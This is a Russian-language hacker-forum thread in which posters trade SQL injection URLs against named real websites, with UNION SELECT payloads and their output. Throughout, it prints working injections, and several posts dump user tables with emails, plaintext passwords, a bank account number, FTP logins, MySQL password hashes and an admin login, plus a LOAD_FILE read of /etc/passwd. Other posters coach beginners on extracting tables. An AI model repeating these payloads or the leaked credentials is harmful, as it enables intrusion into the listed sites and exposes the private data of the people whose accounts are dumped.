Питерское интернет кафе! http://www.shangrila-spb.ru/index.php?action=view&id=-73+UNION+SELECT+1,2,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),0x71),0x71),4,5,6,7,8,9,10,11,12,13-- &module=newsmodule&src=%40random41940a897e943 Database Version: 4.1.11-Debian_4sarge7-log Database name: shangrila User name: adminn@localhost Детишкам поиграться -) http://www.play-publishing.com/?id=72+union+select+1,2,3,concat_ws(0x3a3a,version(),user(),database()),5,6,7,8,9,10,11-- 4.0.22 [email protected] musiccd тИЦ = 40 PageRank = 5 http://www.dorian.ru/catalog/dog.php?screen=1&id=-72+union+select+1,2,3,4,5,6,concat_ws(0x3a3a,version(),user(),database()),8,9,10,11,12-- 5.0.67-log [email protected] u26951_catalog тИЦ = 275
Code: http://www.swschool.org/news_detail.php?id=-1+union+select+1,version(),user(),database()/* version: 4.1.20 user: [email protected] database: ssac Code: http://articles.student.com/article.php?id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14/* version: 4.0.21-standard-log user: webuser@web1 database: studcent Code: http://www.opednews.com/maxwrite/link.php?id=-1+union+select+1,2,3,4,version(),6,7,8,9,10,11/* version: 4.1.22-standard-log user: opednews_vidya@localhost database: opednews_pearl Code: http://energyteachers.org/ReadArticle.php?id=-1+union+select+1,version(),3,4,5,6,7,8,9,10/* version: 5.0.45-log user: [email protected] database: eto Code: http://www.calbank.net/newsite/products&services/index.php?id=-1+union+select+1,2,version(),4,5,6,7,8,9/* version: 4.1.22-standard-log user: [email protected] database: 334937_calcms Code: http://rwjcsp.yale.edu/community.php?id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/* version: 4.0.24-log user: [email protected] database: rwj Code: http://www.ihrc.org.uk/show.php?id=-1+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13/* version: 4.0.27-standard-log user: [email protected] database: db120565932 Code: http://www.business-academy.ru/viezd.php?id=-1+union+select+1,version(),3,4,5/* version: 5.0.45-Max-log user: [email protected] database: srv11037_forum user: lenar pass: vcxzasdf123 Code: http://www.synaptic.ru/soft/section.php?id=-1+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13/* version: 5.0.45-log user: oxid@localhost database: synaptic http://www.conex.biz.ua/auction.php?id=-1+union+select+1,version(),3/* version: 4.1.22-log user: conex@alpha database: conex
Народ, помогите ламеру!!! Нашол уязвимость, полей 15, а что дальше делать,понять не могу. Вставлял любые коды, везде ошибка. попробуйте вы...скажите где ошибка
http://megaload.megalan.tv/program.php?id=35801+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,version(),16,17/* Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/igor/public_html/megaload/program.php on line 121
народ. подскажите как можна вытянуть имя таблицы для получения pass? http://megaload.megalan.tv/program.php?id=35801+union+select+1,2,3,4,5,6,7,8, 9,10,11,12,13,14,15
Code: http://irp.poltava.ua/news.php?news_id=8546[sql] 3-я ветка... __________________________________________ "Журнал ДентАрт" Code: http://www.dentart.org/rubriki.php?rubr=-1+union+select+1,2,version(),4-- 5.0.67-community
synaptic.ru Докрутил, но такого еще не видел, не стал разбираться что куда сувать надо: Если кто будет раэбираться,потом пожалуйста отпишитесь http://www.synaptic.ru/soft/section.php?id=-1+union+select+1,2,concat(bank_account,char(58),bank_name,char(58),email,char(58),char(58),password),4,5,6,7,8,9,10,11,12,13+from+synaptic.users/* ::[email protected]::620be1 40702810990010002180:САНКТ-ПЕТЕРБУРГСКИЙ Ф-Л АКБ "СОЮЗ" (ОАО):[email protected]::uu876ujih98 :[email protected]::983016 ::[email protected]::f7fb60 ::[email protected]::584889 ::[email protected]::1d6b57 ::[email protected]::34a06e :[email protected]::436c69 ::IVAN [email protected]::b0b906 ::[email protected]::cbfcdf ::[email protected]::5188dc ::[email protected]::0ebf27 ::[email protected]::4e1891 http://www.synaptic.ru/soft/section.php?id=-1+union+select+1,2,concat(name,char(58),pass),4,5,6,7,8,9,10,11,12,13+from+psy.users/* Всеволод Викторович Трофимов:vsev http://www.synaptic.ru/soft/section.php?id=-1+union+select+1,2,concat(login,char(58),pass),4,5,6,7,8,9,10,11,12,13+from+oxid.users/* seva:vsev efaberge:eggs jurist:140382 igorv112:qazwsxedc http://www.synaptic.ru/soft/section.php?id=-1+union+select+1,2,concat(name,char(58),email,char(58),pass),4,5,6,7,8,9,10,11,12,13+from+oxid.opinion_users/* seva:[email protected]:ceb3e6 Всеволод:[email protected]:282573 Сева:[email protected]:c65cfa http://www.synaptic.ru/soft/section.php?id=-1+union+select+1,2,concat(host,char(58),port,char(58),user,char(58),pass),4,5,6,7,8,9,10,11,12,13+from+oxid.ftp_servers/* mp3.int.ru:21:anonymous:[email protected] 212.182.63.138:21:anonymous:[email protected] 216.71.74.4:21:anonymous:[email protected] http://www.synaptic.ru/soft/section.php?id=-1+union+select+1,2,concat(login,char(58),pass),4,5,6,7,8,9,10,11,12,13+from+oxid.developers_app/* oxid:vbiflt oxid1:vsev nitroamplifire:xiquliquitrux winampmaniw leosoft:leoam DJUSHMAN:andron gf:gf Yliya:01071986 Ylizka:01071986 http://www.synaptic.ru/soft/section.php?id=-1+union+select+1,2,concat(name,char(58),email,char(58),pass),4,5,6,7,8,9,10,11,12,13+from+oxid.author/* Эстрина Инна:[email protected]:ghjtrn РОФФ ТЕКНОЛОДЖИЗ:[email protected]:techno Агентство "Выше Радуги":[email protected]:rainbow Урюпин Д.А.:[email protected]:kalendar openmusic.ru[email protected]:rainbow :[email protected]roduction :[email protected]:rok Лебедева Елена:[email protected]:kushnirint Оксана и Егор:[email protected]:3214фф Саванчук Катерина:[email protected]:123фыв Мария Карпеева:[email protected]:ghrtt Евгения Карасева:[email protected]:dsdw2 Елена Волосова:[email protected]:action http://www.synaptic.ru/soft/section.php?id=-1+union+select+1,2,concat(Host,char(58),Password,char(58),User),4,5,6,7,8,9,10,11,12,13+from+mysql.user/* :357a136b2575f97f:root :5be372e038520af0xid localhost:4844f090239f56e0:wikiuser :499bd4ec632aac25:dmitr http://www.synaptic.ru/soft/section.php?id=-1+union+select+1,2,concat(Host,char(58),Db,char(58),User),4,5,6,7,8,9,10,11,12,13+from+mysql.db/* %:xid %:test: %:test\_%: %:wikidb:wikiuser http://www.synaptic.ru/soft/section.php?id=-1+union+select+1,2,concat(email,char(58),password),4,5,6,7,8,9,10,11,12,13+from+malkov.users/* [email protected]: 2222:п http://www.synaptic.ru/soft/section.php?id=-1+union+select+1,2,concat(login,char(58),password),4,5,6,7,8,9,10,11,12,13+from+identification.users+limit+0,1/* seva:vsev Larisa:gammy
Скажите плиз, как из ссылки которую дал R1dex вытянуть таблицу чтоб потом можна было позырить пасс? Или киньте ссыль на какой нить фак по этой теме. Всё обыскал...нет такого. Просто не пойму зачем нужен user и database толку с них?
http://www.cohenhillel.org/about/profile.php?pid=-379+union+select+concat_ws(0x7c,user(),database(),version()),2,3/* scully@localhost|scully|4.1.22 2vakula если правильно понял твой вопрос рой в сторону information_schema чтоб знать названия таблиц если версия 5.....) а user() и database() определенной ценности не несут) поможет только если ты имеешь доступ к mysql.user)
http://www.pangeaday.org/filmDetail.php?id=-72/**/union/**/select/**/1,2,3,4,5,6,concat_ws(0x3a3a,version(),user(),database()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23-- Version:5.0.45-log User:[email protected] Databaseangea PageRank = 7 http://www.gsi.ru/catalog.php?id=-72+union+select+1,2,3,concat_ws(0x3a3a,version(),user(),database()),5,6,7,8,9,10,11,12,13-- Version:4.0.24_Debian-10sarge2 User:root@localhost Database:gsi тИЦ = 800 http://mympeg.ru/video.htm?id=-72+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a3a,version(),user(),database()),11,12,13,14,15-- Version:4.1.22-log User:mympeg@localhost Database:wwwmympeglggru PageRank = 5
bloggingheads.tv Обратите внимание на вывод! Возможно, кому то покажется, что принтабельных полей нет.. но, если присмотреться .. VERSION: 5.0.45-log USER [email protected] DATABASE brainwav_bhtvee Логин и пасс админа: rw:exnihil0 Google PR: 7
http://www.usp.br/internacional/home.php?id_cont=12345674+union+select+1,2,3,4,5,concat_ws(0x3a3a,version(),user(),database()),7,8,9,10,11,12,13,14,15--&idioma=en Database Version: 4.0.24_Debian-10sarge3-log Database name: w3internacional User name: w3internacional@localhost PageRank = 8 http://www.skyalbum.com/showAlbum/222225368/**/union/**/select/**/1,2,3,4,5,6,concat_ws(0x3a3a,version(),user(),database()),8,9,10,11,12,13,14,15-- Version:5.0.22 User:skyalbum_db_user@localhost Database:skyalbum PageRank = 7 http://www.skyalbum.com/showAlbum/222225368//**/UNION/**/SELECT/**/1,2,3,4,5,6,CONCAT(0x7873716C696E6A626567696E,(SELECT/**/CONCAT(User,0x7873716C696E6A64656C,Password)/**/FROM/**/mysql.user/**/LIMIT/**/8,1),0x7873716C696E6A656E64),8,9,10,11,12,13,14,15-- [1]:root: [2]:: [3]:: [4]:vbulletin_user:6081047447093d5f [5]:socu:7007c5b04ac32a70 [6]:skyalbum_db_user:5d651ca80db22e8a [7]:skyalbum_user:17f2b11a7aaa0d14 [8]:skyalbum_db_user:5d651ca80db22e8a Читаем /etc/passwd и так далее http://www.skyalbum.com/showAlbum/222225368//**/UNION/**/SELECT/**/1,2,3,4,5,6,CONCAT(0x7873716C696E6A626567696E,LOAD_FILE(0x2F6574632F706173737764),0x7873716C696E6A656E64),8,9,10,11,12,13,14,15-- http://www.specialradio.ru/p&d/?id=722222+union+select+1,2,3,4,concat_ws(0x3a3a,version(),user(),database()),6,7,8,9,10-- Version:4.1.22 User:[email protected] Database:wwwspecialradior_specialradio тИЦ = 1000 PageRank = 6
Code: http://pointsonline.com/php/get_merchant_info.php?a=-1+union+select+concat(user(),0x3a,version(),0x3a,database()),2,3-- loyalty@localhost:4.1.22-standard-log:loyalty
